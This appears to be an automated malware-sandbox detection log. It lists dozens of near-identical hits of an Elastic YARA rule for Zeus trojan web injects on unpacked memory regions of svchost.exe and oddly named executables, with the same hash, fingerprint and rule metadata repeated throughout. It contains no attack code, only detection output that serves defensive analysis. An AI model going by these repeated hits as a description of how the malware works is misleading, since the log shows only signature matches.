Source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.2.svchost.exe.2c70000.5.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.2.svchost.exe.2cd1c00.4.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.2.svchost.exe.407000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.881000.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 35.2.nPtwtzGyOdAtB.exe.f70000.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.f340000.10.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.f280000.28.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.f280000.42.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.f280000.36.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 13.2.nPtwtzGyOdAtB.exe.2f62000.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 38.2.nPtwtzGyOdAtB.exe.2cd0000.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.2d30000.9.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 15.2.nPtwtzGyOdAtB.exe.2b52000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 38.2.nPtwtzGyOdAtB.exe.2c02000.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.2.svchost.exe.29a2000.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.f280000.22.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.f280000.52.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 0.2.WlCVLbzNph.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.f280000.48.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.f280000.51.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.f280000.37.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.2d30000.11.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 32.2.nPtwtzGyOdAtB.exe.26b2000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.2.svchost.exe.2c70000.5.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.f280000.24.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.2.svchost.exe.407000.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.4200000.7.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.2d30000.9.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 0.3.WlCVLbzNph.exe.5c32a8.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.f280000.29.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.f280000.50.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.886c00.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.f280000.45.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 35.2.nPtwtzGyOdAtB.exe.f12000.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.f280000.32.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.2d30000.12.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 0.3.WlCVLbzNph.exe.5c8ea8.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 38.2.nPtwtzGyOdAtB.exe.2cd0000.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.2a50000.6.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.f280000.28.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.f280000.49.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
